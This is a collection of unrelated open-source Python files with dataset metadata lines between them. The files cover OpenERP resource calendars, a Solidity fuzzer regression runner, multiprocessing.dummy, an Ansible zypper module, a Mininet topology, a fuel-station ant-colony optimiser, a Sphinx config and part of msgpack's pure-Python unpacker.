wktime_list.append((day, res_str))
# Convert into format like [('mon', '8:00-12:00', '13:00-18:00')]
for item in wktime_list:
if wk_time.has_key(item[0]):
wk_time[item[0]].append(item[1])
else:
wk_time[item[0]] = [item[0]]
wk_time[item[0]].append(item[1])
for k,v in wk_time.items():
wktime_cal.append(tuple(v))
# Add for the non-working days like: [('sat, sun', '8:00-8:00')]
for k, v in wk_days.items():
if week_days.has_key(k):
week_days.pop(k)
for v in week_days.itervalues():
non_working += v + ','
if non_working:
wktime_cal.append((non_working[:-1], time_range))
return wktime_cal
resource_resource()
class resource_calendar_leaves(osv.osv):
_name = "resource.calendar.leaves"
_description = "Leave Detail"
_columns = {
'name' : fields.char("Name", size=64),
'company_id' : fields.related('calendar_id','company_id',type='many2one',relation='res.company',string="Company", store=True, readonly=True),
'calendar_id' : fields.many2one("resource.calendar", "Working Time"),
'date_from' : fields.datetime('Start Date', required=True),
'date_to' : fields.datetime('End Date', required=True),
'resource_id' : fields.many2one("resource.resource", "Resource", help="If empty, this is a generic holiday for the company. If a resource is set, the holiday/leave is only for this resource"),
}
def check_dates(self, cr, uid, ids, context=None):
leave = self.read(cr, uid, ids[0], ['date_from', 'date_to'])
if leave['date_from'] and leave['date_to']:
if leave['date_from'] > leave['date_to']:
return False
return True
_constraints = [
(check_dates, 'Error! leave start-date must be lower then leave end-date.', ['date_from', 'date_to'])
]
def onchange_resource(self, cr, uid, ids, resource, context=None):
result = {}
if resource:
resource_pool = self.pool.get('resource.resource')
result['calendar_id'] = resource_pool.browse(cr, uid, resource, context=context).calendar_id.id
return {'value': result}
return {'value': {'calendar_id': []}}
resource_calendar_leaves()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -6,097,168,510,317,472,000 | 49.087549 | 356 | 0.564614 | false |
ethereum/solidity | scripts/regressions.py | 1 | 4285 | #!/usr/bin/env python3
from argparse import ArgumentParser
import sys
import os
import subprocess
import re
import glob
import threading
import time
DESCRIPTION = """Regressor is a tool to run regression tests in a CI env."""
class PrintDotsThread(object):
"""Prints a dot every "interval" (default is 300) seconds"""
def __init__(self, interval=300):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
""" Runs until the main Python thread exits. """
## Print a newline at the very beginning.
print("")
while True:
# Print dot
print(".")
time.sleep(self.interval)
class regressor():
_re_sanitizer_log = re.compile(r"""ERROR: (libFuzzer|UndefinedBehaviorSanitizer)""")
def __init__(self, description, args):
self._description = description
self._args = self.parseCmdLine(description, args)
self._repo_root = os.path.dirname(sys.path[0])
self._fuzzer_path = os.path.join(self._repo_root,
"build/test/tools/ossfuzz")
self._logpath = os.path.join(self._repo_root, "test_results")
def parseCmdLine(self, description, args):
argParser = ArgumentParser(description)
argParser.add_argument('-o', '--out-dir', required=True, type=str,
help="""Directory where test results will be written""")
return argParser.parse_args(args)
@staticmethod
def run_cmd(command, logfile=None, env=None):
"""
Args:
command (str): command to run
logfile (str): log file name
env (dict): dictionary holding key-value pairs for bash environment
variables
Returns:
int: The exit status of the command. Exit status codes are:
0 -> Success
1-255 -> Failure
"""
if not logfile:
logfile = os.devnull
if not env:
env = os.environ.copy()
with open(logfile, 'w') as logfh:
with subprocess.Popen(command, shell=True, executable='/bin/bash',
env=env, stdout=logfh,
stderr=subprocess.STDOUT) as proc:
ret = proc.wait()
logfh.close()
return ret
def process_log(self, logfile):
"""
Args:
logfile (str): log file name
Returns:
bool: Test status.
True -> Success
False -> Failure
"""
## Log may contain non ASCII characters, so we simply stringify them
## since they don't matter for regular expression matching
with open(logfile, 'rb') as f:
rawtext = str(f.read())
return not re.search(self._re_sanitizer_log, rawtext)
def run(self):
"""
Returns:
bool: Test status.
True -> All tests succeeded
False -> At least one test failed
"""
testStatus = []
for fuzzer in glob.iglob("{}/*_ossfuzz".format(self._fuzzer_path)):
basename = os.path.basename(fuzzer)
logfile = os.path.join(self._logpath, "{}.log".format(basename))
corpus_dir = "/tmp/solidity-fuzzing-corpus/{0}_seed_corpus" \
.format(basename)
cmd = "find {0} -type f | xargs -n1 sh -c '{1} $0 || exit 255'".format(corpus_dir, fuzzer)
self.run_cmd(cmd, logfile=logfile)
ret = self.process_log(logfile)
if not ret:
print(
"\t[-] libFuzzer reported failure for {0}. "
"Failure logged to test_results".format(
basename))
testStatus.append(False)
else:
print("\t[+] {0} passed regression tests.".format(basename))
testStatus.append(True)
return all(testStatus)
if __name__ == '__main__':
dotprinter = PrintDotsThread()
tool = regressor(DESCRIPTION, sys.argv[1:])
sys.exit(not tool.run())
| gpl-3.0 | -8,180,785,861,071,993,000 | 32.740157 | 102 | 0.538156 | false |
zhjunlang/kbengine | kbe/src/lib/python/Lib/multiprocessing/dummy/__init__.py | 79 | 2881 | #
# Support for the API of the multiprocessing package using threads
#
# multiprocessing/dummy/__init__.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [
'Process', 'current_process', 'active_children', 'freeze_support',
'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition',
'Event', 'Barrier', 'Queue', 'Manager', 'Pipe', 'Pool', 'JoinableQueue'
]
#
# Imports
#
import threading
import sys
import weakref
import array
from .connection import Pipe
from threading import Lock, RLock, Semaphore, BoundedSemaphore
from threading import Event, Condition, Barrier
from queue import Queue
#
#
#
class DummyProcess(threading.Thread):
def __init__(self, group=None, target=None, name=None, args=(), kwargs={}):
threading.Thread.__init__(self, group, target, name, args, kwargs)
self._pid = None
self._children = weakref.WeakKeyDictionary()
self._start_called = False
self._parent = current_process()
def start(self):
assert self._parent is current_process()
self._start_called = True
if hasattr(self._parent, '_children'):
self._parent._children[self] = None
threading.Thread.start(self)
@property
def exitcode(self):
if self._start_called and not self.is_alive():
return 0
else:
return None
#
#
#
Process = DummyProcess
current_process = threading.current_thread
current_process()._children = weakref.WeakKeyDictionary()
def active_children():
children = current_process()._children
for p in list(children):
if not p.is_alive():
children.pop(p, None)
return list(children)
def freeze_support():
pass
#
#
#
class Namespace(object):
def __init__(self, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = list(self.__dict__.items())
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return 'Namespace(%s)' % str.join(', ', temp)
dict = dict
list = list
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def _get(self):
return self._value
def _set(self, value):
self._value = value
value = property(_get, _set)
def __repr__(self):
return '<%s(%r, %r)>'%(type(self).__name__,self._typecode,self._value)
def Manager():
return sys.modules[__name__]
def shutdown():
pass
def Pool(processes=None, initializer=None, initargs=()):
from ..pool import ThreadPool
return ThreadPool(processes, initializer, initargs)
JoinableQueue = Queue
| lgpl-3.0 | -4,967,700,055,803,868,000 | 23.210084 | 79 | 0.622353 | false |
2013Commons/HUE-SHARK | desktop/core/ext-py/eventlet-0.9.14/tests/parse_results.py | 7 | 3671 | import sys
import os
import traceback
try:
import sqlite3
except ImportError:
import pysqlite2.dbapi2 as sqlite3
import re
import glob
def parse_stdout(s):
argv = re.search('^===ARGV=(.*?)$', s, re.M).group(1)
argv = argv.split()
testname = argv[-1]
del argv[-1]
hub = None
reactor = None
while argv:
if argv[0]=='--hub':
hub = argv[1]
del argv[0]
del argv[0]
elif argv[0]=='--reactor':
reactor = argv[1]
del argv[0]
del argv[0]
else:
del argv[0]
if reactor is not None:
hub += '/%s' % reactor
return testname, hub
unittest_delim = '----------------------------------------------------------------------'
def parse_unittest_output(s):
s = s[s.rindex(unittest_delim)+len(unittest_delim):]
num = int(re.search('^Ran (\d+) test.*?$', s, re.M).group(1))
ok = re.search('^OK$', s, re.M)
error, fail, timeout = 0, 0, 0
failed_match = re.search(r'^FAILED \((?:failures=(?P<f>\d+))?,? ?(?:errors=(?P<e>\d+))?\)$', s, re.M)
ok_match = re.search('^OK$', s, re.M)
if failed_match:
assert not ok_match, (ok_match, s)
fail = failed_match.group('f')
error = failed_match.group('e')
fail = int(fail or '0')
error = int(error or '0')
else:
assert ok_match, repr(s)
timeout_match = re.search('^===disabled because of timeout: (\d+)$', s, re.M)
if timeout_match:
timeout = int(timeout_match.group(1))
return num, error, fail, timeout
def main(db):
c = sqlite3.connect(db)
c.execute('''create table if not exists parsed_command_record
(id integer not null unique,
testname text,
hub text,
runs integer,
errors integer,
fails integer,
timeouts integer,
error_names text,
fail_names text,
timeout_names text)''')
c.commit()
parse_error = 0
SQL = ('select command_record.id, command, stdout, exitcode from command_record '
'where not exists (select * from parsed_command_record where '
'parsed_command_record.id=command_record.id)')
for row in c.execute(SQL).fetchall():
id, command, stdout, exitcode = row
try:
testname, hub = parse_stdout(stdout)
if unittest_delim in stdout:
runs, errors, fails, timeouts = parse_unittest_output(stdout)
else:
if exitcode == 0:
runs, errors, fails, timeouts = 1,0,0,0
if exitcode == 7:
runs, errors, fails, timeouts = 0,0,0,1
elif exitcode:
runs, errors, fails, timeouts = 1,1,0,0
except Exception:
parse_error += 1
sys.stderr.write('Failed to parse id=%s\n' % id)
print repr(stdout)
traceback.print_exc()
else:
print id, hub, testname, runs, errors, fails, timeouts
c.execute('insert into parsed_command_record '
'(id, testname, hub, runs, errors, fails, timeouts) '
'values (?, ?, ?, ?, ?, ?, ?)',
(id, testname, hub, runs, errors, fails, timeouts))
c.commit()
if __name__=='__main__':
if not sys.argv[1:]:
latest_db = sorted(glob.glob('results.*.db'), key=lambda f: os.stat(f).st_mtime)[-1]
print latest_db
sys.argv.append(latest_db)
for db in sys.argv[1:]:
main(db)
execfile('generate_report.py')
| apache-2.0 | 1,373,256,941,787,906,300 | 32.990741 | 105 | 0.51076 | false |
perzizzle/ansible-modules-extras | packaging/os/zypper_repository.py | 22 | 8763 | #!/usr/bin/python
# encoding: utf-8
# (c) 2013, Matthias Vogelgesang <[email protected]>
# (c) 2014, Justin Lecher <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: zypper_repository
author: "Matthias Vogelgesang (@matze)"
version_added: "1.4"
short_description: Add and remove Zypper repositories
description:
- Add or remove Zypper repositories on SUSE and openSUSE
options:
name:
required: false
default: none
description:
- A name for the repository. Not required when adding repofiles.
repo:
required: false
default: none
description:
- URI of the repository or .repo file. Required when state=present.
state:
required: false
choices: [ "absent", "present" ]
default: "present"
description:
- A source string state.
description:
required: false
default: none
description:
- A description of the repository
disable_gpg_check:
description:
- Whether to disable GPG signature checking of
all packages. Has an effect only if state is
I(present).
required: false
default: "no"
choices: [ "yes", "no" ]
aliases: []
refresh:
description:
- Enable autorefresh of the repository.
required: false
default: "yes"
choices: [ "yes", "no" ]
aliases: []
notes: []
requirements: [ zypper ]
'''
EXAMPLES = '''
# Add NVIDIA repository for graphics drivers
- zypper_repository: name=nvidia-repo repo='ftp://download.nvidia.com/opensuse/12.2' state=present
# Remove NVIDIA repository
- zypper_repository: name=nvidia-repo repo='ftp://download.nvidia.com/opensuse/12.2' state=absent
# Add python development repository
- zypper_repository: repo=http://download.opensuse.org/repositories/devel:/languages:/python/SLE_11_SP3/devel:languages:python.repo
'''
REPO_OPTS = ['alias', 'name', 'priority', 'enabled', 'autorefresh', 'gpgcheck']
def zypper_version(module):
"""Return (rc, message) tuple"""
cmd = ['/usr/bin/zypper', '-V']
rc, stdout, stderr = module.run_command(cmd, check_rc=False)
if rc == 0:
return rc, stdout
else:
return rc, stderr
def _parse_repos(module):
"""parses the output of zypper -x lr and returns a parse repo dictionary"""
cmd = ['/usr/bin/zypper', '-x', 'lr']
repos = []
from xml.dom.minidom import parseString as parseXML
rc, stdout, stderr = module.run_command(cmd, check_rc=True)
dom = parseXML(stdout)
repo_list = dom.getElementsByTagName('repo')
for repo in repo_list:
opts = {}
for o in REPO_OPTS:
opts[o] = repo.getAttribute(o)
opts['url'] = repo.getElementsByTagName('url')[0].firstChild.data
# A repo can be uniquely identified by an alias + url
repos.append(opts)
return repos
def _parse_repos_old(module):
"""parses the output of zypper sl and returns a parse repo dictionary"""
cmd = ['/usr/bin/zypper', 'sl']
repos = []
rc, stdout, stderr = module.run_command(cmd, check_rc=True)
for line in stdout.split('\n'):
matched = re.search(r'\d+\s+\|\s+(?P<enabled>\w+)\s+\|\s+(?P<autorefresh>\w+)\s+\|\s+(?P<type>\w+)\s+\|\s+(?P<name>\w+)\s+\|\s+(?P<url>.*)', line)
if matched == None:
continue
m = matched.groupdict()
m['alias']= m['name']
m['priority'] = 100
m['gpgcheck'] = 1
repos.append(m)
return repos
def repo_exists(module, old_zypper, **kwargs):
def repo_subset(realrepo, repocmp):
for k in repocmp:
if k not in realrepo:
return False
for k, v in realrepo.items():
if k in repocmp:
if v.rstrip("/") != repocmp[k].rstrip("/"):
return False
return True
if old_zypper:
repos = _parse_repos_old(module)
else:
repos = _parse_repos(module)
for repo in repos:
if repo_subset(repo, kwargs):
return True
return False
def add_repo(module, repo, alias, description, disable_gpg_check, old_zypper, refresh):
if old_zypper:
cmd = ['/usr/bin/zypper', 'sa']
else:
cmd = ['/usr/bin/zypper', 'ar', '--check']
if repo.startswith("file:/") and old_zypper:
cmd.extend(['-t', 'Plaindir'])
else:
cmd.extend(['-t', 'plaindir'])
if description:
cmd.extend(['--name', description])
if disable_gpg_check and not old_zypper:
cmd.append('--no-gpgcheck')
if refresh:
cmd.append('--refresh')
cmd.append(repo)
if not repo.endswith('.repo'):
cmd.append(alias)
rc, stdout, stderr = module.run_command(cmd, check_rc=False)
changed = rc == 0
if rc == 0:
changed = True
elif 'already exists. Please use another alias' in stderr:
changed = False
else:
#module.fail_json(msg=stderr if stderr else stdout)
if stderr:
module.fail_json(msg=stderr)
else:
module.fail_json(msg=stdout)
return changed
def remove_repo(module, repo, alias, old_zypper):
if old_zypper:
cmd = ['/usr/bin/zypper', 'sd']
else:
cmd = ['/usr/bin/zypper', 'rr']
if alias:
cmd.append(alias)
else:
cmd.append(repo)
rc, stdout, stderr = module.run_command(cmd, check_rc=True)
changed = rc == 0
return changed
def fail_if_rc_is_null(module, rc, stdout, stderr):
if rc != 0:
#module.fail_json(msg=stderr if stderr else stdout)
if stderr:
module.fail_json(msg=stderr)
else:
module.fail_json(msg=stdout)
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(required=False),
repo=dict(required=False),
state=dict(choices=['present', 'absent'], default='present'),
description=dict(required=False),
disable_gpg_check = dict(required=False, default='no', type='bool'),
refresh = dict(required=False, default='yes', type='bool'),
),
supports_check_mode=False,
)
repo = module.params['repo']
state = module.params['state']
name = module.params['name']
description = module.params['description']
disable_gpg_check = module.params['disable_gpg_check']
refresh = module.params['refresh']
def exit_unchanged():
module.exit_json(changed=False, repo=repo, state=state, name=name)
rc, out = zypper_version(module)
match = re.match(r'zypper\s+(\d+)\.(\d+)\.(\d+)', out)
if not match or int(match.group(1)) > 0:
old_zypper = False
else:
old_zypper = True
# Check run-time module parameters
if state == 'present' and not repo:
module.fail_json(msg='Module option state=present requires repo')
if state == 'absent' and not repo and not name:
module.fail_json(msg='Alias or repo parameter required when state=absent')
if repo and repo.endswith('.repo'):
if name:
module.fail_json(msg='Incompatible option: \'name\'. Do not use name when adding repo files')
else:
if not name and state == "present":
module.fail_json(msg='Name required when adding non-repo files:')
if repo and repo.endswith('.repo'):
exists = repo_exists(module, old_zypper, url=repo, alias=name)
elif repo:
exists = repo_exists(module, old_zypper, url=repo)
else:
exists = repo_exists(module, old_zypper, alias=name)
if state == 'present':
if exists:
exit_unchanged()
changed = add_repo(module, repo, name, description, disable_gpg_check, old_zypper, refresh)
elif state == 'absent':
if not exists:
exit_unchanged()
changed = remove_repo(module, repo, name, old_zypper)
module.exit_json(changed=changed, repo=repo, state=state)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 | 1,061,772,929,313,967,600 | 29.427083 | 154 | 0.60881 | false |
lishuai12/onosfw-L3 | tools/test/topos/rftesttopo.py | 35 | 1679 | #!/usr/bin/env python
"""
"""
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.node import RemoteController
from mininet.node import Node
from mininet.node import CPULimitedHost
from mininet.link import TCLink
from mininet.cli import CLI
from mininet.log import setLogLevel
from mininet.util import dumpNodeConnections
class ReactiveForwardingTestTopo( Topo ):
"Internet Topology Zoo Specimen."
def __init__( self ):
"Create a topology."
# Initialize Topology
Topo.__init__( self )
# add nodes, switches first...
s1 = self.addSwitch( 's1' )
s2 = self.addSwitch( 's2' )
s3 = self.addSwitch( 's3' )
s4 = self.addSwitch( 's4' )
s5 = self.addSwitch( 's5' )
s6 = self.addSwitch( 's6' )
s7 = self.addSwitch( 's7' )
s8 = self.addSwitch( 's8' )
s9 = self.addSwitch( 's9' )
# ... and now hosts
h1 = self.addHost( 'h1' )
h2 = self.addHost( 'h2' )
h3 = self.addHost( 'h3' )
h4 = self.addHost( 'h4' )
# add edges between switch and corresponding host
self.addLink( s1 , h1 )
self.addLink( s2 , h2 )
self.addLink( s3 , h3 )
self.addLink( s4 , h4 )
# add edges between switches
self.addLink( s1 , s5 )
self.addLink( s2 , s5 )
self.addLink( s2 , s8 )
self.addLink( s3 , s4 )
self.addLink( s3 , s7 )
self.addLink( s4 , s5 )
self.addLink( s6 , s8 )
self.addLink( s6 , s7 )
self.addLink( s5 , s9 )
self.addLink( s6 , s9 )
topos = { 'att': ( lambda: ReactiveForwardingTestTopo() ) }
| apache-2.0 | 105,193,427,664,448,300 | 27.457627 | 59 | 0.57296 | false |
pycharmers-hackathon/hackathon-rep | SmartFuel/SmartFuel/aco.py | 2 | 3615 | from math import radians, cos, sin, sqrt, atan2
import random
import operator
def aco(petrol_stations, gas_type, capacity, initial_petrol, overall_dist,
consumption, source, target, ants=2, a=1, b=1, iterations=10):
pheromone = {station['id']: 4 for station in petrol_stations}
probability = lambda source, i, feasible, dist: pheromone[i] ** a * h(source, i, dist) ** b / \
summation(source, feasible, calulate_distance)
summation = lambda source, feasible, dist: sum(pheromone[i] ** a * h(source, i, dist) ** b
for i in feasible)
h = lambda source, i, dist: 1.22000 / dist(source, i)
solutions = []
overall_best_sol = None
overall_cost = float('inf')
for i in range(iterations):
best_sol = None
best_cost = float('inf')
for j in range(ants):
sol, cost = construct_solution(source, target, petrol_stations, initial_petrol,
consumption, overall_dist, probability,
capacity, gas_type)
solutions.append((sol, cost))
if cost < best_cost:
best_cost = cost
best_sol = sol
if best_cost < overall_cost:
overall_cost = best_cost
overall_best_sol = best_sol
update_pheromone(pheromone, best_sol, best_cost)
return overall_best_sol, overall_cost
def construct_solution(source, target, petrol_stations, initial_petrol,
consumption, overall_dist, probability, capacity,
gas_type):
feasible_dist = initial_petrol * consumption
dist = calulate_distance(source, target)
sol = []
cost = 0.0
while feasible_dist < dist:
feasible_stations = get_feasible(source, target, petrol_stations,
feasible_dist, overall_dist)
p = {feasible_station: probability(source, feasible_station, feasible_stations,
calulate_distance)
for feasible_station in feasible_stations}
next_patrol = max(p.iteritems(), key=operator.itemgetter(1))[0]
quantity = calulate_distance(source, next_patrol) * consumption
feasible_dist = (capacity - quantity) * consumption
sol.append({next_patrol: quantity})
source = next_patrol
cost += quantity * next_patrol[gas_type]
return sol, cost
def update_pheromone(pheromone, sol, cost):
for item in sol.keys():
pheromone[item] += 1 / cost
def calulate_distance(source, target):
R = 3673.0
source_lat = radians(source[0])
source_lng = radians(source[1])
target_lat = radians(target[0])
target_lng = radians(target[1])
dist_lat = target_lat - source_lat
dist_lng = target_lng - source_lng
a = sin(dist_lat / 2) ** 2 + cos(source_lat) * cos(target_lat) * sin(dist_lng / 2) ** 2
c = 2 * atan2(sqrt(a), sqrt(1 - a))
return R * c
def get_feasible(source, target, petrol_stations, feasible_dist, overall_dist):
"""Returns list of ids. """
accepted = []
for petrol_station in petrol_stations:
dist1 = calulate_distance(source, (petrol_station['latitude'],
petrol_station['longitude']))
dist2 = calulate_distance((petrol_station['latitude'], petrol_station['longitude'])
, target)
if dist2 > overall_dist:
continue
if dist1 <= feasible_dist:
accepted.append(petrol_station['id'])
return accepted | cc0-1.0 | 8,963,224,348,596,850,000 | 39.177778 | 99 | 0.584786 | false |
bcarlin/flask-scss | doc/conf.py | 1 | 7157 | # -*- coding: utf-8 -*-
#
# Flask-Scss documentation build configuration file, created by
# sphinx-quickstart on Fri Jul 8 17:32:32 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.coverage']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['.templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Flask-Scss'
copyright = u'2013, Bruno Carlin'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.5'
# The full version, including alpha/beta/rc tags.
release = '0.5'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['.build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for Autodoc extensions -------------------------------------------
autoclass_content = 'both'
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'flask_small'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['.themes']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['.static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Flask-Scssdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Flask-Scss.tex', u'Flask-Scss Documentation',
u'Bruno Carlin', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'flask-scss', u'Flask-Scss Documentation',
[u'Bruno Carlin'], 1)
]
| mit | 2,545,251,070,512,069,600 | 31.680365 | 80 | 0.703926 | false |
tdmsinc/three.js | utils/converters/msgpack/msgpack/fallback.py | 641 | 26403 | """Fallback pure Python implementation of msgpack"""
import sys
import array
import struct
if sys.version_info[0] == 3:
PY3 = True
int_types = int
Unicode = str
xrange = range
def dict_iteritems(d):
return d.items()
else:
PY3 = False
int_types = (int, long)
Unicode = unicode
def dict_iteritems(d):
return d.iteritems()
if hasattr(sys, 'pypy_version_info'):
# cStringIO is slow on PyPy, StringIO is faster. However: PyPy's own
# StringBuilder is fastest.
from __pypy__ import newlist_hint
from __pypy__.builders import StringBuilder
USING_STRINGBUILDER = True
class StringIO(object):
def __init__(self, s=b''):
if s:
self.builder = StringBuilder(len(s))
self.builder.append(s)
else:
self.builder = StringBuilder()
def write(self, s):
self.builder.append(s)
def getvalue(self):
return self.builder.build()
else:
USING_STRINGBUILDER = False
from io import BytesIO as StringIO
newlist_hint = lambda size: []
from msgpack.exceptions import (
BufferFull,
OutOfData,
UnpackValueError,
PackValueError,
ExtraData)
from msgpack import ExtType
EX_SKIP = 0
EX_CONSTRUCT = 1
EX_READ_ARRAY_HEADER = 2
EX_READ_MAP_HEADER = 3
TYPE_IMMEDIATE = 0
TYPE_ARRAY = 1
TYPE_MAP = 2
TYPE_RAW = 3
TYPE_BIN = 4
TYPE_EXT = 5
DEFAULT_RECURSE_LIMIT = 511
def unpack(stream, **kwargs):
"""
Unpack an object from `stream`.
Raises `ExtraData` when `packed` contains extra bytes.
See :class:`Unpacker` for options.
"""
unpacker = Unpacker(stream, **kwargs)
ret = unpacker._fb_unpack()
if unpacker._fb_got_extradata():
raise ExtraData(ret, unpacker._fb_get_extradata())
return ret
def unpackb(packed, **kwargs):
"""
Unpack an object from `packed`.
Raises `ExtraData` when `packed` contains extra bytes.
See :class:`Unpacker` for options.
"""
unpacker = Unpacker(None, **kwargs)
unpacker.feed(packed)
try:
ret = unpacker._fb_unpack()
except OutOfData:
raise UnpackValueError("Data is not enough.")
if unpacker._fb_got_extradata():
raise ExtraData(ret, unpacker._fb_get_extradata())
return ret
class Unpacker(object):
"""
Streaming unpacker.
`file_like` is a file-like object having a `.read(n)` method.
When `Unpacker` is initialized with a `file_like`, `.feed()` is not
usable.
`read_size` is used for `file_like.read(read_size)`.
If `use_list` is True (default), msgpack lists are deserialized to Python
lists. Otherwise they are deserialized to tuples.
`object_hook` is the same as in simplejson. If it is not None, it should
be callable and Unpacker calls it with a dict argument after deserializing
a map.
`object_pairs_hook` is the same as in simplejson. If it is not None, it
should be callable and Unpacker calls it with a list of key-value pairs
after deserializing a map.
`ext_hook` is callback for ext (User defined) type. It called with two
arguments: (code, bytes). default: `msgpack.ExtType`
`encoding` is the encoding used for decoding msgpack bytes. If it is
None (default), msgpack bytes are deserialized to Python bytes.
`unicode_errors` is used for decoding bytes.
`max_buffer_size` limits the buffer size. 0 means INT_MAX (default).
Raises `BufferFull` exception when it is unsufficient.
You should set this parameter when unpacking data from an untrustred source.
example of streaming deserialization from file-like object::
unpacker = Unpacker(file_like)
for o in unpacker:
do_something(o)
example of streaming deserialization from socket::
unpacker = Unpacker()
while 1:
buf = sock.recv(1024*2)
if not buf:
break
unpacker.feed(buf)
for o in unpacker:
do_something(o)
"""
def __init__(self, file_like=None, read_size=0, use_list=True,
object_hook=None, object_pairs_hook=None, list_hook=None,
encoding=None, unicode_errors='strict', max_buffer_size=0,
ext_hook=ExtType):
if file_like is None:
self._fb_feeding = True
else:
if not callable(file_like.read):
raise TypeError("`file_like.read` must be callable")
self.file_like = file_like
self._fb_feeding = False
self._fb_buffers = []
self._fb_buf_o = 0
self._fb_buf_i = 0
self._fb_buf_n = 0
self._max_buffer_size = max_buffer_size or 2**31-1
if read_size > self._max_buffer_size:
raise ValueError("read_size must be smaller than max_buffer_size")
self._read_size = read_size or min(self._max_buffer_size, 2048)
self._encoding = encoding
self._unicode_errors = unicode_errors
self._use_list = use_list
self._list_hook = list_hook
self._object_hook = object_hook
